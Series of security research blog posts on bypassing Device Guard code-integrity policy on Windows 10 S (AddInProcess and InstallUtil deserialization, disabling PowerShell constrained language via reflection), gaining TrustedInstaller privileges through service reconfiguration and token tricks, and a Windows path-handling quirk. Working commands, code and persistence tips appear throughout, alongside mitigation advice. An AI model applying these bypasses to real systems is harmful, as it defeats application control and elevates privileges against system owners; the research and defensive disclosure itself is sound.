This is great and really simple, it does sadly suffer from one tiny flaw, barely worth mentioning really… We can’t run CMD. Oh well back to the drawing board. What else can we use? While WSH is blocked, we can still run scriptlets in regsvr32. However, the scriptlet hosting environment is enlightened, which in the case of JScript/VBScript means you’re severely limited in what COM objects you can create. One of the only objects you can create is the Scripting.FileSystemObject which allows you to open arbitrary text files and read/write to them. It supports opening named pipes as a byproduct of the fact it also uses some of this functionality for handling process output. Therefore you can do something like the following to write arbitrary data to a named pipe.

var fso =new ActiveXObject("Scripting.FileSystemObject");
var pipe ="\\\\.\\pipe\\32A91B0F-30CD-4C75-BE79-CCBD6345DE11";
// Create a new ANSI text file object to the named pipe.
var file = fso.CreateTextFile(pipe,true,false);
// Write raw data to the pipe.
var data ="RAW DATA";
file.Write(data);
file.Close();


Unfortunately nothing is ever simple. The request data is arbitrary binary, so I initially tried to use a Unicode text file which makes writing binary data trivial. The class writes a Byte-Order-Mark (BOM) to the start when creating the file which screws up the request. So I tried ANSI mode, however this converts the UCS-2 characters from JScript into the current ANSI Code Page. On an English Windows system this is typically code page 1252, you can build a mapping table between a UCS-2 character and an arbitrary 8 bit character. However, if your system is set to another code page such as one of the more complex multi-byte character sets such as Shift-JIS this might be impossible. Anyway I’m sure I could make it work on more platforms with a bit more effort but it does the job, it allows me to load any arbitrary .NET code I like and execute it with the full DG Win10S policy enforced.


I’ve uploaded the code to my github here. Run the CreateAddInIpcData tool on another machine with the path to a IL-only .NET assembly and the name of the output scriptlet file. Make sure to give the scriptlet file an .sct extension. The .NET assembly must contain single public class with an empty constructor to act as the entry point during deserialization. Some C# similar to the following should do it, just compile into a class library Assembly.


publicclass EntryPoint {
   public EntryPoint(){
       MessageBox.Show("Hello");
   }
}


Copy the output scriptlet file to the Win10S machine. Start AddInProcess with the earlier command line (make sure the GUID is the same as previous as the endpoint URI ends up in the serialized request) and specify a PID (get it from Task Manager). Make sure the AddInProcess executable doesn’t immediately exit, which would indicate an error in your command line. Execute the scriptlet either by right clicking it in Explorer and selecting “Unregister” or manually using the following command from Explorer’s Run dialog:


regsvr32 /s /n /u /i:c:\path\to\scriptlet.sct scrobj.dll


You should now find your arbitrary .NET gets executed in the context of AddInProcess. From here you can write any code you like, well except for loading unsigned .NET assemblies from a file on disk that is.


addin_capture.PNG


That’s all for now. It should be clear that UMCI and .NET do not mix very well, just as it didn’t 4 years ago when I used similar tricks to break Windows RT. I’ve no idea if Microsoft have any future plans to limit things like loading .NET assemblies from memory (based on the response to issues like this I doubt it).


If you’re worried about this bypass you can block AddInProcess in your DG or Applocker policy. However until Microsoft find a solution to the Confused Deputy problem of .NET applications circumventing CI policy there will certainly be other bypasses. If you want to add this binary to your DG policy I’d recommend following the instructions on this blog post. Don't forget to also blacklist AddInProcess32 while you're at it.

Next time, we’ll go into leveraging this arbitrary code execution to run some more analysis tools and perhaps even get Powershell back, providing a good example of why you should always write your tooling in .NET. ;-)

DG on Windows 10 S: Analysing the System

$
0
0
In the previous post, we got arbitrary .NET code execution on Win10S without needing a copy of Office or upgrading to Windows 10 Pro. This, however doesn’t really achieve our ultimate goal of trying to run any applications we like, while UMCI is enforced. We can use the arbitrary code execution to run some analysis tools to understand Win10S better and facilitate further modifications to the system.

This post is mainly about how to implement a harness to load more complex .NET content in as simple a way as possible including getting back a full PowerShell environment (within reason) without needing to run powershell.exe - one of the many blacklisted applications.

Dealing with Assembly Loading

Our simple .NET assembly we used in the last post only had dependencies on built-in, system assemblies. These system assemblies are supplied with the OS and so are signed with a Microsoft Windows Publisher certificate. This means the system assemblies are permitted to be loaded as image files by the system integrity policy. Anything we build ourselves of course isn’t going to be permitted to be loaded from files.

As we’re loading our assembly from a byte array, the SI policy doesn’t apply. For simple assemblies with only system dependencies, this isn’t necessarily an issue. However, if we want to load more complex assemblies, which reference other untrusted assemblies, we’ll have more difficulty. Due to .NET using late binding it’s possible you might not immediately see an assembly loading issue, only when you try and access a method or type from that assembly will the Framework try and load it, leading to exceptions.

When an assembly is loaded, the Framework will parse an assembly name. Can we not just pre-load a dependent assemblies from a byte array, then let the loader resolve it when required? Let’s try that by loading an assembly from a byte array and then reloading it by name. If preloading works, the load by name should be successful. Compile the following simple C# application which will load the assembly from a byte array then try and load it again by its full name:

using System;
using System.IO;
using System.Reflection;

class Program
{
   staticvoid Main(string[] args)
   {
       try
       {
           Assembly asm = Assembly.Load(File.ReadAllBytes(args[0]));
           Console.WriteLine(asm.FullName);
           Console.WriteLine(Assembly.Load(asm.FullName));
       }
       catch(Exception ex)
       {
           Console.WriteLine(ex.Message);
       }
   }
}

Now run this application and pass it the path to an assembly to load (ensure the assembly is outside of the directory you compiled the above code to). You should see output similar to the following:

C:\build\LoadAssemblyTest> LoadAssemblyTest.exe ..\test.dll
test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
Could not load file or assembly 'test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified.

I guess it doesn’t work as loading the assembly by name throws an exception. This is a limitation in the way .NET loads assemblies from byte arrays. The name of the loaded assembly isn’t registered in any global assembly table. On the one hand this is good, it allows multiple assemblies with the same name to coexist in the same process. On the other hand it’s bad, as it means that if we don’t directly reference the Assembly instance we can’t access anything in that assembly. As referenced assemblies are always loaded by name, this means that no amount of pre-loading it going to help get more complex assemblies to work.

The .NET Framework provides a solution to this problem, you can specify an Assembly Resolver event handler. The Assembly Resolver event is called whenever the runtime fails to find an assembly either from the loaded assembly list or from a file on disk. This typically happens if the assembly is located outside of the application’s base directory. It should be noted however that if the runtime finds a file on disk which matches its criteria it will try and load it. If this file isn’t permitted by the SI policy, the load will fail, however, the runtime does not consider that to be a failure from a resolving perspective so the runtime will not call our event handler in that case.

The event handler is passed a name to resolve. This name could be a partial name, or a full Assembly Name with additional information such as PublicKeyToken and Version. Therefore, we’ll just pass the name string to the AssemblyName class and use that to extract just the name of the assembly, nothing else. We can then use that name to search for a file with that name and a DLL or EXE extension. In the example bootstrap I’ve put up on Github, this defaults to searching either in the assembly directory in your user’s documents or an arbitrary list of paths specified in the ASSEMBLY_PATH environment variable. Finally, if we find the assembly file, we’ll load it from a byte array and return it to the event’s caller, making sure to cache the assembly file for later queries.

AssemblyName name =new AssemblyName(args.Name);
string path = FindAssemblyPath(name.Name,".exe")??
             FindAssemblyPath(name.Name,".dll");
if(path !=null){
   Assembly asm = Assembly.Load(File.ReadAllBytes(path));
   _resolved_asms[args.Name]= asm;
   _resolved_asms[asm.FullName]= asm;
}
else{
   _resolved_asms[args.Name]=null;
}

The final step in the bootstrap code is to load an entry assembly using the ExecuteAssemblyByName method. This entry assembly should contain a Main entry point, be called startasm.exe and placed in the search path. You could put all your analysis code inside a single the bootstrap assembly but that can quickly get large, and sending the serialized data to the AddInProcess named pipe isn’t exactly efficient. Plus by starting a new executable it’s possible to quickly replace the functionality you want to run without needing to regenerate the scriptlet everytime you change the assembly.

Note that if any assembly you want to load contains native code (e.g mixed mode CIL and C++) then this isn’t going to work. To run native code you need to make load the assembly as an image, it doesn’t work from the a byte array. Of course pure managed CIL can pretty do everything native code can do, so always write your tools in .NET.

Bootstrapping a PowerShell Console

With the ability to execute any .NET assemblies by name including any dependencies, it’s time we get an interactive environment running. And what better interactive environment to run than our old friend PowerShell. With PowerShell being written in .NET it would make perfect sense that powershell.exe is also a .NET assembly.

powershell.PNG

I guess not, though it’s worth noting that the Powershell ISE is a full .NET assembly, so we could load that instead. But I prefer the command line version in most cases. There’s research into getting PowerShell without powershell.exe, but at least in the examples I know such as https://github.com/p3nt4/PowerShdll they don’t tend to do it in a nice and easy way. Typically, they implement their own shell and pass PS scripts from the command line into a PowerShell runspace. Fortunately we don’t have to guess how powershell.exe works, while we could reverse engineer the binary the core of the executable is now open source. For example here’s the unmanaged code for starting the console.

Boiling it down to the simplest code possible, the native entry point creates an instance of the UnmanagedPSEntry class and calls the Start method. As long as there exists a console for the process, calling Start present a fully working PowerShell interactive environment. While AddInProcess is a console application already, you can call AllocConsole or AttachConsole to create a new console or attach to an existing console if necessary. We can even set the console title and icon while we’re at it to give us the warm feeling of running full PowerShell.

AllocConsole();
SetConsoleTitle("Windows Powershell");
UnmanagedPSEntry ps =new UnmanagedPSEntry();
ps.Start(null,newstring[0]);

That should be it, we’ve got PowerShell running, everything's fine, at least until you start using the console. At which point you might encounter an error:

constrained.PNG

Seems that while we’ve successfully bypassed the UMCI check for image loading, PowerShell still tries to enforce Constrained Language mode. This makes sense, all we’ve done is cut out loading powershell.exe, not the rest of the UMCI lockdown policy for PowerShell. The check for what mode to run is through the GetSystemLockdownPolicy method in the SystemPolicy class. This calls into the WldpGetLockdownPolicy function in the Windows Lockdown Policy DLL (WLDP) to query for the what to do for PowerShell. By passing null as the source path the function returns the general system policy. This function is also the entry point for checking for the policy for individual files, by passing a path to a signed script the policy can be enforced selectively for scripts. This is how signed Microsoft modules run with Full Language mode while the main shell might run as Constrained. Having a look around it’s clear that the SystemPolicy class is caching the result of the policy lookup in the private systemLockdownPolicy static field. Therefore, if we use reflection to set this value to SystemEnforcementMode.None before calling into any other PS code we’ll disable the lockdown.

var fi =typeof(SystemPolicy).GetField("systemLockdownPolicy",
       BindingFlags.NonPublic | BindingFlags.Static);
fi.SetValue(null, SystemEnforcementMode.None);

Doing this results in our desired PowerShell with no lockdown restrictions.

full_language.PNG

I’ve uploaded the RunPowershell implementation to Github. Build the executable and copy it to %USERPROFILE\Documents\assembly\startasm.exe then execute the bootstrap code using the previous DG bypass.

Poking Around the System

With PowerShell up and running, we can now do some inspection of the system. One of the first things I ensured I could do was to install my NtObjectManager module. The Install-Module cmdlet doesn’t work so well as it tries to install the NuGet module which won’t load under the lockdown policy. Instead you can just download the module’s files and if you specify the module’s directory in the list of assembly paths for the bootstrap you can just import the PSD1 file and it should load successfully.

At this point, you can poke around yourself. I’ve added a couple of methods to the NtApiDotNet assembly to dump system information about the SI policy. For example there’s NtSystemInfo.CodeIntegrityOptions which dumps the current CI enabled flags as well as NtSystemInfo.CodeIntegrityFullPolicy which is a new option on Windows Creator Update (presumably for Win10S support) which dumps all configured CI policies. The interesting thing about this when run on Win10S is that there’s actually two policies enforced, the SI policy and what seems to be a revocation policy of some sort. By extracting policies this way, we should be able to ensure we’ve got the correct policy information that the system is enforcing, not just the file we think is the policy.
code_integrity.PNG

Finally, I’ve added a PowerShell cmdlet New-NtKernelCrashDump to create a kernel crash dump (don’t worry it doesn’t crash the system) as long as you’ve got SeDebugPrivilege, which you can get by running AddInProcess as an administrator. While this doesn’t allow you to modify the system, it does at least allow you to poke at the internal data structures to see what’s what. Of course you’ll need to copy the kernel dump to another system in order to run WinDBG.

kernel_dump.PNG

Wrap Up

This blog post was a very quick write up of getting more complex .NET content running on Win10S once you’ve got your foot in the door. I’d advocate writing your analysis tools in .NET wherever possible as it just makes running them on a locked down system that much easier. Sure, you could use a reflective DLL loader, but why go to that level of effort when .NET already wrote it for you.

DG on Windows 10 S: Abusing InstallUtil

$
0
0
This is the final blog post I’m going to do on Windows 10 S. The previous parts are here, here and here. Originally, I was going to describe a way of completely removing the SI policy on Win10S without upgrading to Pro so that you can install any applications you like *ahem* while keeping secure boot etc. intact.


chrome_win10_s.PNG


However, I decided that enforcing the SI policy was more about licensing than it was about security so I’ve thought better of it. If you really want to run arbitrary applications on your own computer:

  1. Don’t buy a Windows 10 S machine in the first place.
  2. Or, failing that, upgrade to Pro, at least for the Surface Laptop that’s still currently free.
  3. Or, failing that, work out how I removed the policy, it’s not that hard ;-)


Instead of disabling the entire policy, I’ll detail another DG bypass. In this case, it’s exploiting the same root cause as the previous one I disclosed, .NET loading untrusted code from a byte array through serialization, but with an interesting twist (*spoiler* it’s not using BinaryFormatter, well mostly). Therefore, I don’t think it makes that much difference to disclose. MS, or at least the .NET team (hi Barry), are unlikely to fix the fundamental incompatibility between DG and .NET any time soon.

Is That You, NetDataContractSerializer?

It turns out that BinaryFormatter and .NET remoting was just too dangerous to let live and MS finally removed it from .NET. Just kidding, MS did no such thing. While MS might try and put scary, if somewhat small, warnings when you try and search for documentation on .NET remoting and BinaryFormatter, both technologies are still there in the .NET framework and no warnings are produced when using them. In fact BinaryFormatter is so awesome, it’s coming back in .NET Core 2.0 which is a bit of a shame IMHO.

What did happen in version 3.0 of the .NET Framework was the introduction of Windows Communication Foundation (WCF), a new object communication stack for accessing remote services. Learning well from the past, MS chose to use XML Web Services (well perhaps didn’t learn that well from the past) and instead of BinaryFormatter, they implemented a new serialization mechanism, Data Contracts. The canonical implementation of the WCF Data Contracts is the DataContractSerializer (DCS) class. In order to use the DCS class for serialization you are supposed to annotate your classes and properties with the DataContractAttribute and DataMemberAttribute. Explicitly annotated, Data Contracts are not that interesting, however, clearly someone decided that it’d be great if there was a way of serializing existing serializable classes. Therefore, DCS also supports serializing arbitrary classes as long as they have the SerializableAttribute annotation, for example if you have the following C# class:

namespace DCSerializer {
 [Serializable]
 publicclass Contract {
     publicint Value;
 }
}

And run it through the DCS WriteObject method you’ll get the following XML content:

<Contract
   xmlns="http://schemas.datacontract.org/2004/07/DCSerializer"
   xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
 <Value>1234</Value>
</Contract>

In theory, there’s enough information to deserialize this XML file without any special knowledge, the namespace (DCSerializer) and the class name (Contract) and reflected in the default XML namespace and root element name respectively. However, what’s missing here is a reference to what assembly the Contract type exists in. This ambiguity is resolved by requiring that all known types (outside of some specific system types) must be specified during construction or through a resolver. This isn’t a problem in a simple, well defined web service. But it does make DCS less useful as a general, exploitable serializer.

While DCS is awesome in its own way, the requirement for specifying all types is a weakness, from a lazy developer point of view. It would be nice if you could get some of the flexibility of the more general serializers such as BinaryFormatter. This is where the similar but different NetDataContractSerializer (NDCS) class comes into the picture. Both DCS and NDCS (and the related DataContractJsonSerializer) derive from the XmlObjectSerializer class. This allows NDCS to be used for WCF services instead of DCS if you so desire. Serializing the previous class through NDCS generates the following:

<Contract
 z:Id="1"
 z:Type="DCSerializer.Contract"
 z:Assembly="DCSerializer, Version=1.0.0.0"
 xmlns="http://schemas.datacontract.org/2004/07/DCSerializer"
 xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/">
 <Value>1234</Value>
</Contract>

The output from NDCS includes assembly information. Therefore NDCS works in a similar way to BinaryFormatter in that it doesn’t need any prior knowledge of the types being deserialized. This makes NDCS the equivalent of BinaryFormatter but in XML format, though to be fair .NET already had something similar with the SoapFormatter. This is a long winded way of saying, if you can find an application which will load an untrusted NDCS XML file, you can exploit it with the exact same set of serialization gadgets as you can with BinaryFormatter from my previous post. The question therefore is, does such an application exist? Let’s see just one example.

The Ways of InstallUtil

InstallUtil is a .NET utility which is pre-installed with the .NET Framework. The utility has been available since at least v1.1 (I don’t have anything with v1.0 to check). Its purpose is to allow you to run installation code from an assembly so that you can configure system state and install your code. To use it normally, you first define a class which derives from the Installer class, annotate your class with the RunInstallerAttribute and then implement one of the main callback methods such as Install.

For example, the following class is sufficient to be executed by InstallUtil:

[RunInstaller(true)]
publicclass TestInstaller : Installer {
   publicoverridevoid Install(IDictionary stateSaver){
       Console.WriteLine("Hello from the Installer");
       base.Install(stateSaver);
   }
}

If you compile the class into an assembly, you can then run the installer using the following command line and it will execute the Install method in your assembly:

InstallUtil path\to\installer.dll

The interesting thing about InstallUtil is it’s a known Application Whitelisting bypass (specifically against something like AppLocker). The executable is Microsoft signed, located in a system directory and will execute code from an arbitrary assembly file passed on the command line. However, what it isn’t is a DG bypass. InstallUtil loads the assembly from a file, the file needs to be allowed to load in the SI policy, which means for Win10S we can only load existing assemblies signed by Microsoft. We might be able to find an assembly with an installer we could abuse, but I didn’t look very hard. Still, that doesn’t mean we can’t abuse InstallUtil in other ways.

If you run the simpler installer through InstallUtil, you might notice a file which gets created next to the installer assembly file which has an InstallState extension. This file begs for closer inspection. Opening it in a text editor you’ll encounter content which looks awfully familiar:

<ArrayOfKeyValueOfanyTypeanyType
 xmlns:i="http://www.w3.org/2001/XMLSchema-instance"
 xmlns:x="http://www.w3.org/2001/XMLSchema"
 z:Id="1"
 z:Type="System.Collections.Hashtable"
 z:Assembly="0"
 xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"
 xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
...

This looks a lot like the output from a NDCS serialization. To confirm we can just go looking at the code in a decompiler, the assembly doesn’t seem to be available in the reference source. InstallUtil is actually just a thin wrapper around the ManagedInstallerClass class which is implemented in the System.Configuration.Installer assembly. Poking around a bit, we find that AssemblyInstaller is using NDCS in a number of places. We’re not too interested in places where the NDCS is used to write out objects, rather, we’re more interested in places where it’s reading. For example in the Uninstall method, there’s the following code:

publicoverridevoid Uninstall(IDictionary savedState){
 string installStatePath = GetInstallStatePath(Path);
 if(File.Exists(installStatePath)){
   FileStream fileStream =new FileStream(installStatePath);
   XmlReader xmlReader = XmlReader.Create(fileStream);
   var ser =new NetDataContractSerializer();
   IDictionary savedState = ser.ReadObject(xmlReader);
   
   // Run uninstaller...
   base.Uninstall(savedState);
 } 
}

From this snippet of code, we can see that the untrusted install state file it loaded verbatim with a insecure NDCS class instance. If we can can convince InstallUtil to load a crafted install state file which contains a deserialization chain to load an assembly from a byte array, we can bypass DG. While we can’t load untrusted assemblies, the utility doesn’t need a specific assembly so we can just instruct it to uninstall a system assembly such as mscorlib. Don’t worry, it won’t actually do anything as mscorlib doesn’t contain any installers. Also, looking at the documentation there’s a InstallStateDir parameter we can pass to specify where the utility will look for our install state. If we copy the serialized file to c:\dummy\mscorlib.InstallState then we can get the DG bypass by running the following command:

InstallUtil /u /InstallStateDir=c:\dummy /AssemblyName mscorlib

I’ve updated my DG bypass Github repository to include this bypass as well. Run the CreateInstallState utility passing the path to the assembly to load (again it will instantiate the first public type it finds) and the output filename such as mscorlib.InstallState. Execute the previous InstallUtil command and you should get your assembly executed. Note that InstallUtil will try and delete the InstallState file after use, if you don’t want that to happen you can just set the Read-Only flag on the file and the delete will fail.

The main advantage to this DG bypass over the previous one I disclosed in AddInProcess is that it’s easy to use for persistence. Just add a scheduled task which runs InstallUtil or a LNK file in the startup folder with the appropriate command line and the code DG bypass will run when you login.
As a final note, you might wonder how InstallUtil serialized the install state prior to v4 of the Framework, specifically as NDCS was only introduced in v3.0? Dropping the v2 System.Configuration.Installer assembly into the decompiler we find it uses, *drum roll*SoapFormatter. So it’s just as vulnerable to this attack in v2, assuming you’ve got v2 compatible gadgets (most v2 installs are really v3.5 so that’s typically a yes as the gadgets I presented in the previous post were introduced in v3.0).

While this bypass exists currently in Win10S and likely in many custom DG policies, it’s easy to just ban InstallUtil as you would with AddInProcess and this would eliminate the bypass. Again I’ll give you a link to Matt Graeber’s blog post about adding new executables to your DG policy.

Final Wrap Up

This is the end of my planned series on Win10S. Hopefully, I’ve demonstrated that regardless of the PR coming out of Microsoft that it’s not 100% secure, at least against anyone who knows you run Win10S and is willing to customize an attack to you or your organization. There will always be bypasses for DG, and the way Windows works, it’s almost impossible to completely lock it down. If it wasn’t .NET, it’d be a memory corruption vulnerability from an overlong command line parameter or something equally silly.

Does Win10S have no value what so ever? Of course not, DG is a good, if not perfect, way of limiting a system to a very a specific set of signed executables. I’d be less sceptical about Win10S if it hadn’t become so transparently a marketing ploy rather than a goal to really push the Windows platform forward. Unfortunately, I can’t see the goal of a secure Windows platform ever being reached without completely jettisoning all the reasons that Windows works for people at the moment.

I’d like to thank Matt Graeber for his knowledge of Device Guard and for doing reviews of these posts to make sure I’m not talking complete rubbish. Also shout outs to everyone looking for these sorts of issues such as Matt Nelson, Casey Smith, Alvaro Muñoz and no doubt others I’m forgetting.

The Art of Becoming TrustedInstaller

$
0
0
If you’ve spent any time administering a Windows system post Vista you’ll have encountered the TrustedInstaller (TI) group which most system files and registry keys are ACL’ed to. If, for example you look at the security for a file in System32 you’ll notice both that only TI can delete and modify files (not even the Administrators group is allowed) and the Owner is also TI so you can’t directly change the security either.


File Security Descriptor Dialog showing Trusted Installer as Owner


However, if you look in the Local Users and Groups application you won’t find a TI user or group. This blog post is about what the TI group really is, and more importantly, with the aid of PowerShell and the NtObjectManager module, how you can be TIto do whatever you wanted to do.

Where is TrustedInstaller?

If TI isn’t a user or group then what is it? Perhaps looking at the ACL more closely will give us some insight. You can use the Get-Acl cmdlet to read the security descriptor from a file and we can list the TI ACE.

File ACL in PowerShell Showing Full TrustedInstaller name.


We can see in the IdentityReference member that we’ve got the TI group, and it’s prefixed with the domain “NT SERVICE”. Therefore, this is a Windows Service SID. This is a feature added in Vista to allow each running service to have groups which they can use for access checks, without the overhead of adding individual real groups to the local system.

The SID itself is generated on the fly as the SHA1 hash of the uppercase version of the service name. For example the following code will calculate the actual SID:

$name="TrustedInstaller"
# Calculate service SID
$bytes=[Text.Encoding]::Unicode.GetBytes($name.ToUpper())
$sha1=[System.Security.Cryptography.SHA1]::Create()
$hash=$sha1.ComputeHash($bytes)
$rids=New-Object UInt32[]5
[Buffer]::BlockCopy($hash,0,$rids,0,$hash.Length)
[string]::Format("S-1-5-80-{0}-{1}-{2}-{3}-{4}", `
       $rids[0],$rids[1],$rids[2],$rids[3],$rids[4])

Of course you don’t need to do this, NTDLL has a RtlCreateServiceSid function, and LSASS will convert a service name to a SID and vice versa. Anyway, back to the point. What this means is that there’s a service called TrustedInstaller which must be running when system resources are modified. And that’s exactly what we find if we query with the SC utility.

trusted_installer_service.PNG


If we start the TI service and look at the Access Token we’ll see that it has the TI group enabled.

Access Token Showing TrustedInstaller SID


Enough of the background, assuming we’re an administrator how can we harness the power of TrustedInstaller?

Becoming TrustedInstaller

If you search on the Web for how to delete resources owned by TI you’ll tend to find articles that advocate manually taking ownership of the file or key, then change the DACL to add the administrators group. This is because even the usually compliant IFileOperation UAC COM object won’t do this automatically, as you’ll end up with the following dialog.

File Access Denied Dialog due to TrustedInstaller Owner

Changing the permissions on a system file isn’t exactly a great idea. If you do it wrong you could easily open up parts of your system to EoP issues, especially with directories. Explorer can make it easy to accidentally replace the security settings on all subfolders and files with little way of getting back the original values. Of course, the reason for TI is to stop you doing all this in the first place, but some people seem to really want it do it for some reason.

You might assume you could just add your current user to the TI group and that’s that? Unfortunately the LSASS APIs such as NetLocalGroupAddMembers takes a group name not a SID, and passing “NT SERVICE\TrustedInstaller” doesn’t work, as it’s not a real group, but created synthetically. There might be a magic incantation to do it, or at least a low-level RPC call, but I didn’t think it was worth the effort.

Therefore, the quick and dirty way would be to change the configuration of the TI service to run a different binary. Oddly, even though TI makes things on the system harder to mess with, it doesn’t protect its own service configuration from modification by a normal administrator. So you can issue a command such as the following to delete an arbitrary file as TI:

sc config TrustedInstaller binPath= "cmd.exe /C del path\to\file"

Start the TI service and *bang* the file is gone. Another reason this works is TI is not a Protected Process Light (PPL), which is odd because the TI group is given special permission to stop and delete PPL services. I pointed this out to MSRC (and Alex Ionescu did so in 2013, and clearly I didn’t bother to read it) but they didn’t do anything to fix it as no matter what they pretend PPL isn’t a security boundary, well until it a security boundary.

This still feels like a hack, you’d have to restore the TI service to its original state otherwise things like Windows Update will get unhappy really quickly. As the TI service has a token with the correct groups, what about just starting the service then “borrowing” the Token from it to create a new process or for impersonation?

As an admin we’ve got SeDebugPrivilege so can just open the TI process and open it’s token. Then we can do whatever we like with it. Simple really, let’s give that a try.

PowerShell window showing capturing the token from TrustedInstaller process.

Well that was easy. Pat yourself on the back, grab a cold one it’s time for some Trusted Installering…

PowerShell console showing token can't be used for a new process or impersonation

Well crap, seems we can’t create a new process or impersonate the token. That’s not much good. At the bottom of the screenshot we can see why, the token we’ve got only has TOKEN_QUERY access. We typically need at least TOKEN_DUPLICATE access to get the primary token for a new process or to create an impersonation token. Checking the security descriptor of the token using Process Hacker (we don’t even have READ_CONTROL to read it from PS) explains the reason why we’ve got such limited access.

Security descriptor for TrustedInstaller access token.

We can see that the Administrators group only has TOKEN_QUERY access which at least matches up with the access we were granted on the token object. You might wonder why SeDebugPrivilege didn’t help here. The Debug privilege only bypass the security checks on Process and Thread objects, it doesn’t do anything on Tokens so we get no help. Are we stuck now, at least without the more destructive techniques such as changing the service binary?

Of course not. There are examples of how to get stuff running as TI such as this but they seem to rely on first getting code running at system by install a service (like psexec with the -s switch) and then stealing the the TI token and creating a new process. Needless to say, if I wanted to create a service I’d just modify the TrustedInstaller service to begin with :-)

So here’s two quick tricks to allow use to get around this permission limitation which doesn’t require any new or modified services or injecting shellcode. First, let’s deal with creating a new process. The parent of a new process is the caller of CreateProcess, however for UAC this would make all elevated processes children of the UAC service which would look somewhat odd. To support the principle of least surprise MS introduced in Vista the ability to specify an explicit parent process when creating a new process so that the elevated process could still be a child of the caller.

Normally in the UAC case you specify an explicit token to assign to the new process. However, if you don’t specify a token the new process will inherit from the assigned parent, the only requirement for this is the handle to the process we use as a parent must have the PROCESS_CREATE_PROCESS access right. As we’ve got SeDebugPrivilege we can get full access to the TI process including the right to create new child processes from it. As an added bonus the kernel process creation code will even assign the correct session ID for the caller so we can create interactive processes. We exploit this behavior to create an arbitrary process running as the TI service token on the current desktop using the New-Win32Process cmdlet and passing the process object in the -ParentProcess parameter.

PowerShell window showing successful process creation from parent process

It’d by kind of useful to impersonate the token as well without creating a new process. Is there a way we can achieve that? Sure, we can use the NtImpersonateThread API, which allows you capture the impersonation context from an existing thread and apply it to another. The way impersonation contexts work is the kernel will try and capture the impersonation token for the thread first. If there is no existing impersonation token then it’ll take a copy of the primary token of the process associated with thread and impersonate that instead. And the beauty of the NtImpersonateThread API, like setting the parent process, doesn’t require permission to access the token, it just required THREAD_DIRECT_IMPERSONATION access to a thread which we can get due to SeDebugPrivilege. We can therefore get an impersonation thread without a new process by the following steps:
  1. Open process with at least PROCESS_QUERY_INFORMATION access to list its threads.
  2. Open the first thread in the process with THREAD_DIRECT_IMPERSONATION access. We’ll assume that the thread isn’t impersonating some lowly user.
  3. Call NtImpersonateThread to steal an impersonation token.


PowerShell console showing successful impersonation.


Now as long as something else doesn’t set the main thread’s impersonation token (and you don’t do anything on a separate thread) then your PS console we act as if it has the TI group enabled. Handy :-)

Wrap-Up

Hopefully this has given you some information about what TrustedInstaller and a few tricks to get hold of a token for that group using an admin account which would not normally be allowed. This applies equally to a number of different system services on modern Windows, which can be pain if you want to interact with their resources for testing purposes such as using my Sandbox Tools to work out what resources they can access.

Update (20170821)
Thought I should at least repeat that of course there's many ways of getting the TI token other than these 3 techniques. For example as Vincent Yiu pointed out on Twitter if you've got easy access to a system token, say using Metasploit's getsystem command you can impersonate system and then open the TI token, it's just IMO less easy :-). If you get a system token with SeTcbPrivilege you can also call LogonUserExExW or LsaLogonUser where you can specify an set of additional groups to apply to a service token. Finally if you get a system token with SeCreateTokenPrivilege (say from LSASS.exe if it's not running PPL) you can craft an arbitrary token using the NtCreateToken system call.

Accidental Directory Stream

$
0
0
It’s a well known fact that interface layers are a good source of bugs, and potentially security vulnerabilities. A feature which makes sense at the time of development might come back as a misfeature in subsequent years due to layers built above the feature. This blog post will describe one such weird edge case in file path handling on Windows. This edge case is very much in the category of "interesting" but not necessarily "useful" from a security perspective. If anyone thinks of a good use for it, let us all know :-)


Let's start with a simple bit of C++ code:


BOOL OpenFile(LPCWSTR filename){
 HANDLE file = CreateFileW(filename, GENERIC_READ,
   FILE_SHARE_READ,nullptr, CREATE_ALWAYS,0,nullptr);
 if(file == INVALID_HANDLE_VALUE)
   return FALSE;

 CloseHandle(file);
 return TRUE;
}


Nothing too strange here, OpenFile is just a wrapper around CreateFile. The purpose is to create a new file with a specified name and report TRUE if the creation was successful or FALSE if it was not. Now we need to something to call OpenFile.

void Test(LPCWSTR filename){
 if(!OpenFile(filename))
   wcout <<L"Error (base) - "<< filename << endl;
 else
   wcout <<L"Success (base) - "<< filename << endl;

 WCHAR full_path[MAX_PATH];
 if(!GetFullPathNameW(filename, MAX_PATH, full_path,nullptr)){
   wcout <<L"Error getting full path"<< endl;
   return;
 }

 if(!OpenFile(full_path))
   wcout <<L"Error (full) - "<< filename << endl;
 else
   wcout <<L"Success (full) - "<< filename << endl;
}
The Test function calls opens a file twice. First it just uses the base filename passed to the function. The base filename is then converted to a full path and the file is opened again. If there’s no funny stuff then the two open calls should be equivalent.

void RunTests(){
 WCHAR temp_path[MAX_PATH];

 GetTempPathW(MAX_PATH, temp_path);
 SetCurrentDirectoryW(temp_path);

 Test(L"abc");
 Test(L":xyz");
}


Finally we’ve have RunTests which will contains a couple of calls to Test. The function first changes the current directory to the user’s tempdirectory so we know we’re in a writable location and then runs Test twice with different filenames abcand :xyz. What would we expect the results to be? The first test tries to create the file abc. Nothing too strange, according to the general Win32 path conversion rules you’d expect the abc file to be created inside the temp directory. The second test :xyz is a bit more tricky, it looks like a Alternate Data Stream (ADS) name, however to be a valid stream name you need the name of the file before the colon otherwise what file would it add the stream to? Let’s find out the results by running the code:


Success (base) - abc
Success (full) - abc
Success (base) - :xyz
Error (full) - :xyz


We’ll that result is unexpected. While we guessed correctly that abcwould succeed, it seems :xyz succeeded when we passed it the base filename but failed when we used the full filename. There must be some a good reason for that behavior. Let’s use a debugger to try and work out why this occurs. First I run the application in WinDBG adding the following breakpoint which will break on NtCreateFile and dump the OBJECT_ATTRIBUTES which contains the filename, the wait for the call to complete and print the NTSTATUS result:


bp ntdll!NtCreateFile "!obja @r8; gu; !error @rax; gh"


With the breakpoint set the tests can be executed, the following is the output:


Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is abc
OBJ_CASE_INSENSITIVE
Error code: (Win32) 0 (0) - The operation completed successfully.
Obja +00000009ac6ff828 at 00000009ac6ff828:
Name is \??\C:\Users\user\AppData\Local\Temp\abc
OBJ_CASE_INSENSITIVE
